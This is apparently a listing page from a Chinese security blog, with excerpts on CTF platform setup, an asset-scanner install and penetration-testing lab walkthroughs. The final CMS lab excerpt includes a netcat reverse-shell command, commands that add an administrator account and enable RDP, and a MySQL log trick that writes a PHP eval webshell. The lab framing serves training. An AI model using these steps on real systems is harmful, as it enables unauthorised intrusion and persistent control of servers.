首页
工具导航
留言面板
友情链接
Search
1
【红队工具】VShell v4.9.3 高级版,国产C2工具下载及使用
13,152 阅读
2
全网最全渗透测试靶场推荐【2026最新靶场推荐】,拒绝信息差
7,832 阅读
3
2025最新渗透测试靶场推荐,新手必练的靶场推荐
6,261 阅读
4
src平台推荐,挖SRC必须知道的25个漏洞提交平台
5,815 阅读
5
几个常见的密码字典推荐
5,535 阅读
AI
OSCP打靶
安全服务
建站
泷羽收录
渗透学习
渗透工具
服务器
登录
Search
标签搜索
渗透测试
内网渗透
Linux
网络协议
vulnhub
靶场实战
SQL注入
提权
代理隧道
域渗透
信息收集
权限提升
hackmyvm
WAF绕过
AI安全
云安全
蓝队防御
权限维持
红队攻击
云服务
白小羽
累计撰写
192
篇文章
累计收到
2
条评论
首页
导航
工具导航
留言面板
友情链接
搜索到
183
篇与
的结果
2025-05-18
灯塔安装教程
【信息收集】24年11月最新灯塔安装教程最近做总结课程总结,安装灯塔的时候,遇到了下面这两种问题,官方镜像不在了应该是,拉取不了。然后搜了很多资料发现了这个东西,人家已经装好的2.6.1版本,用docker导入就好了百度网盘: https://pan.baidu.com/s/1-V-0M-sXHEqi1Ri-6FrNew?pwd=1212 下载后,放到kali里面(这里我用的kali,比较方便,可以使用自己的服务器或者习惯的操作系统),用解压命令unzipunzip ARL.zip总共多出4个压缩包,这个ARL-2.6.1.zip就不要导入到docker了,后面要解压解压ARL-2.6.1.zip切换到ARL-2.6.1使用ls -a可以看到隐藏的 .env 文件注意,修改的时候一定不要少了那个 v创建数据库arl_dbdocker-compose up -d访问http://服务器IP地址:5003即可登录,默认账号密码admin/arlpass(友情提醒:登陆后请立即修改密码)添加任务等待扫描完成导出异常这里需要修改你的 config-docker.yaml文件,去fofa对接自己的api修改配置文件后,重新执行如下命令更新配置,就可以使用了docker-compose restart因为是注册用户,不支持api的调用这里我开了一个高级会员,api key,给大家一起用,在这个链接,如果出现超时,那么就是当日导出数量过多,第二天再来查就行https://mp.weixin.qq.com/s/ngY7rtth0OjVe83c8r-Fvg这里我是没有新加策略的等待资产搜集完成查看ip信息导出数据使用策略,新加一个策略之后下发fofa任务就可以指定策略了,刚刚不小心把导出次数用完了,,,查询的时候注意加上 size 关键字。。。。那就静静等待,12点后,哈哈哈哈这时候就有其他信息了在你添加的策略勾选的信息,这里都会有SSL证书信息服务及端口指纹统计计划任务貌似出bug了,添加的时候添加不上还有更多,自行尝试吧往期推荐111
2025年05月18日
1,864 阅读
0 评论
0 点赞
2025-05-18
GZCTF比赛平台搭建——单Docker部署
前言GZCTF,一个开源的网络安全竞赛平台,它巧妙地融合了React.js前端技术和Django后端架构,为用户提供了一个通过实战演练提升安全技能的宝贵舞台。无论你是初学者、教育机构还是企业培训部门,GZCTF都能满足你的需求,其丰富的功能如权限控制、加密通信以及自定义赛事等,将带给你前所未有的使用体验。官方文档:https://docs.ctf.gzti.me/zh/quick-start操作系统:ubuntu-22.04.4(已重装)1、换源从0开始,换源vim /etc/apt/sources.list修改为如下内容deb https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ jammy main restricted universe multiverse # deb-src https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ jammy main restricted universe multiverse deb https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ jammy-updates main restricted universe multiverse # deb-src https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ jammy-updates main restricted universe multiverse deb https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ jammy-backports main restricted universe multiverse # deb-src https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ jammy-backports main restricted universe multiverse deb https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ jammy-security main restricted universe multiverse # deb-src https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ jammy-security main restricted universe multiverse更新apt源:apt update2、安装Docker继去年Docker Hub被封锁后,各大NAS的注册表均出现问题,例如群晖的Docker套件注册表无法连接(更新至DSM7.2版本后恢复)。而在今年2024年6月初(约2024.06.06),NAS中最重要的工具Docker又面临无法使用的问题。常用镜像站:
2025年05月18日
1,240 阅读
0 评论
0 点赞
2025-05-18
GZCTF动态flag部署教程
前言不知道为什么今天,我的DockerHub push的时候连接超时,只能本地演示了,不上传到自己的Dockerhub,如果你们有自己的加速源,当然也可以之际push到自己的DockerHub仓库。Web篇章web题,首先是需要按照常规逻辑写一个网页,这里就写一个带flag的简单网页,把flag放在源代码里,并注释掉。创建一个html文件,代码如下<!DOCTYPE html> <html> <head> <title>签到</title> </head> <!--flag{testflag}--> <body> <?php echo "Do u want 2 sign??<br>"; ?> </body> </html>我所使用的平台无需暴露端口,如有需要可以使用EXPOSE 80暴露80端口。接下来实现动态flag,还记得上面提到的flag.sh吗,先来看一下它的代码,同样相关解释写在注释里,正式使用记得删掉注释。#!/bin/sh #必需的东西没什么好讲的 sed -i "s/flag{testflag}/$GZCTF_FLAG/" /var/www/html/index.php #使用平台的动态flag替换 # index.php中的flag,这里我使用的平台为GZCTF,因此动态flag环境变量为$GZCTF_FLAG,其他平台一般为$FLAG export GZCTF_FLAG="" #这一句暂时不知道什么作用,但是要写着flag.sh文件完整内容#!/bin/sh sed -i "s/flag{testflag}/$GZCTF_FLAG/" /var/www/html/index.php export GZCTF_FLAG=""接下来编写Dockerfile,各语句解释就写在后面的注释里吧,正式编写请删掉注释。FROM CTFtraining/base_image_nginx_mysql_php_56 #web题Docker基础镜像,这里使用CTFtraing打包好 的,包含了基础的nginx,mysql,php环境,并且会自动运行flag.sh脚本(后面会提到),本题使用php环境。 COPY src /var/www/html # 将你编写的网页源码复制到Docker容器中,这里为php网页,因此只需要 复制源码到/var/www/html就可以了,其他类型网页按照实际部署情况COPY到Docker中相应目录下就可以了 RUN mv /var/www/html/flag.sh / #把你源码中的flag.sh复制到根目录以便自动执行 && chmod +x /flag.sh #添加运行权限Dockerfile完整内容FROM CTFtraining/base_image_nginx_mysql_php_56 COPY src /var/www/html RUN mv /var/www/html/flag.sh / && chmod +x /flag.sh目录结构确保你已经Docker login,拥有自己的Docker账号使用build命令,构建本地的题目镜像,xiaoyuss为你的docker镜像名,可以参考我以前的文章,webtest为镜像名(自定义),"."为版本号,代表latest,也可以自定义,不过拉取时记得加上版本号docker build -t name/webtest .接下来部署题目,类型记得选择动态容器,不同平台可能有所不同,这里以GZCTF为例。启动赛题flag随机生成成功PWN篇首先下载一个库,pwn题基本逻辑一般为利用栈溢出漏洞,打通后得到shell权限,因此把flag文件放在容器的根目录或其他目录下即可,为了安全,这里在ctf_xinetd基础上做出一些修改来进行pwn题的部署git clone https://github.com/Eadom/ctf_xinetd.git cd ctf_xinetd修改Dockerfile如下内容FROM ubuntu:16.04 RUN sed -i "s/http://archive.ubuntu.com/http://mirrors.tuna.tsinghua.edu.cn/g" /etc/apt/sources.list && apt-get update && apt-get -y dist-upgrade && apt-get install -y lib32z1 xinetd RUN useradd -m ctf WORKDIR /home/ctf RUN cp -R /lib* /home/ctf && cp -R /usr/lib* /home/ctf RUN mkdir /home/ctf/dev && mknod /home/ctf/dev/null c 1 3 && mknod /home/ctf/dev/zero c 1 5 && mknod /home/ctf/dev/random c 1 8 && mknod /home/ctf/dev/urandom c 1 9 && chmod 666 /home/ctf/dev/* RUN mkdir /home/ctf/bin && cp /bin/sh /home/ctf/bin && cp /bin/ls /home/ctf/bin && cp /bin/cat /home/ctf/bin COPY ./ctf.xinetd /etc/xinetd.d/ctf COPY ./flag.sh /flag.sh RUN echo "Blocked by ctf_xinetd" > /etc/banner_fail RUN chmod +x /flag.sh COPY ./bin/ /home/ctf/ RUN chown -R root:ctf /home/ctf && chmod -R 750 /home/ctf && chmod 740 /home/ctf/flag CMD ["/flag.sh"] EXPOSE 70修改后的ctf.xinetdservice ctf { disable = no socket_type = stream protocol = tcp wait = no user = root type = UNLISTED port = 70 bind = 0.0.0.0 server = /usr/sbin/chroot # replace helloworld to your program server_args = --userspec=1000:1000 /home/ctf ./pwn #pwn为二进制可执行文件的文件名 banner_fail = /etc/banner_fail # safety options per_source = 10 # the maximum instances of this service per source IP address rlimit_cpu = 20 # the maximum number of CPU seconds that the service may use #rlimit_as = 1024M # the Address Space resource limit for the service #access_times = 2:00-9:00 12:00-24:00 } 把"start.sh"改为"flag.sh",以下为flag.sh的具体内容#!/bin/sh # Add your startup script #!/bin/sh sed -i "s/flag{pwntestflag}/$GZCTF_FLAG/" /home/ctf/flag export GZCTF_FLAG="" # DO NOT DELETE /etc/init.d/xinetd start; sleep infinity;然后修改flag的内容为flag{pwntestflag}这个变量,不然随机不成功打包到本地Docker仓库docker build -t xiaoyuss/pwntest .编辑题目的时候注意端口启动实例提交flag测试
2025年05月18日
2,352 阅读
0 评论
0 点赞
2025-05-18
cisp-pte综合练习win2003
masscan扫描1.php能正常上传但是,文件内容过滤了大小写绕过,上传成功,没有对大小写进行过滤分析上传成功的文件名称名称由md5(文件全名+rand(1,1000))尝试访问这个文件发送到攻击器bp设置添加前缀图片名称进行hash添加后缀完整配置爆破查找跟目录有一个get it查看源代码
2025年05月18日
1,710 阅读
0 评论
0 点赞
2025-05-18
深入某CMS渗透测试:从弱口令到接管webshell
前言401验证,在网络通信和HTTP协议中,特指一种状态码——401 Unauthorized(未经授权)。当客户端尝试访问受保护的资源时,如果未能提供有效的身份验证信息,或者提供的信息不足以获得访问权限,服务器就会返回401状态码,表示请求未被授权。靶场复现弱口令123456当然也可以使用bp爆破base64解密添加迭代器,用户字典在这里添加一个冒号添加密码字典添加处理规则base64编码这里发现一个百分号的url编码,他就是我们401认证中间的冒号这里取消url编码即可然后进行爆破即可,找到一个响应为200的就是爆破成功的然后解密就好返回页面登录成功后就会得到key1进入到首页登录sql注入尝试,被验证了双引号也不行对搜索框进行xss攻击,发现对<>进行了过滤url编码,但是被转义成了script的a标签,还是以字符串的形式添加到相关搜索注册一个用户信息这里成功注册了,但是也没有alert(1)查看首页过来,也没有,修改闭合标签<strong>试试修改信息,并添加一个strong标签失败了,好像还有字符长度限制在短消息界面中尝试xss失败,没效果xss验证,被转义成了字符串</textarea><script>alert(1)</script>好家伙直接添加成功,也没有xss漏洞找到默认 织梦 后台管理地址管理员没有修改默认登录界面admin 万能密码绕过,没有效果查看端口开放信息这个端口也没有什么东西3306端口,mysql远程连接试试,拒绝远程连接robots爬虫协议/include/templets,都没发现什么东西找到头像设置界面,一句话图片马能上传了可以上传图片,但是找了好一会儿,没有找到文件包含的地方御剑目录扫描扫不出任何东西这里有一个认证,就是401认证,用普通的目录扫描工具是扫不出任何东西的Authorization: Basic YWRtaW46MTIzNDU2用burp suite扫描抓包指定好御剑的字典目录扫描路径刚刚扫描到的phpmyadmin这个错误介绍MySQL是一个流行的开放源代码关系数据库管理系统。它是许多Web应用程序的基础,例如WordPress,Magento和Drupal等。MySQL允许用户通过自己的主机或云服务器上的phpMyAdmin进行MySQL管理。然而,有时候用户可能会遇到MySQL Error # 1045 – Cannot Log in to MySQL server -> phpmyadmin错误。这篇文章将介绍这个错误,以及如何解决它。错误原因该错误通常意味着您没有权限访问MySQL服务器。在MySQL中有一个root用户,它是MySQL服务器的超级管理员。如果您尝试使用root用户登录MySQL服务器但不知道密码,或者尝试通过phpMyAdmin使用root用户但是密码错误,那么您就会遇到MySQL Error # 1045。此外,如果您使用的是不正确的用户名或密码,也会遇到此错误。弱口令root/root成功一、后台文件上传登录mysql,找到指定的数据表,查看admin密码解密admin/888888成功进入到了后台界面找到这个文件式管理器,找到key2查看这个key2上传php文件用nmap进行扫描扫出来结果为windows系统执行命令dir查看系统信息,是windows server 2008操作系统在当前uploads目录上传一个nc.exe移交cmd权限到攻击机器nc.exe [ip] [端口] -e cmddir查看是否成功查看用户权限信息,是超级管理员,那么我们就可以添加一个管理员用户添加用户,并添加到admin用户组# 添加一个用户 net user 用户名 password /add # 添加用户名到指定用户组 net localgroup administrators 用户名 /add开启远程wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1nmap扫描指定端口,查看是否开启用你刚刚添加的用户进行远程连接查看administrator目录,成功访问,获得目标服务器权限,这里环境没有配置key3,演示结束。二、日志写入phpmyadmin日志功能SHOW VARIABLES LIKE "%general%"这里我们查看日志状态是开启的,我们可以尝试写日志的方式,获取shell命令如果没有打开也可以使用如下脚本,打开日志功能SET GLOBAL GENERAL_LOG=on在上面我们看到了日志的路径,确定了本站为phpstudy搭建的,我们修改日志文件到我们的shell.php查看脚本是否存在写入日志SELECT "<?php @eval($_POST[10]); ?>"这里不要忘了添加401验证的请求头
2025年05月18日
1,182 阅读
0 评论
0 点赞
1
...
35
36
37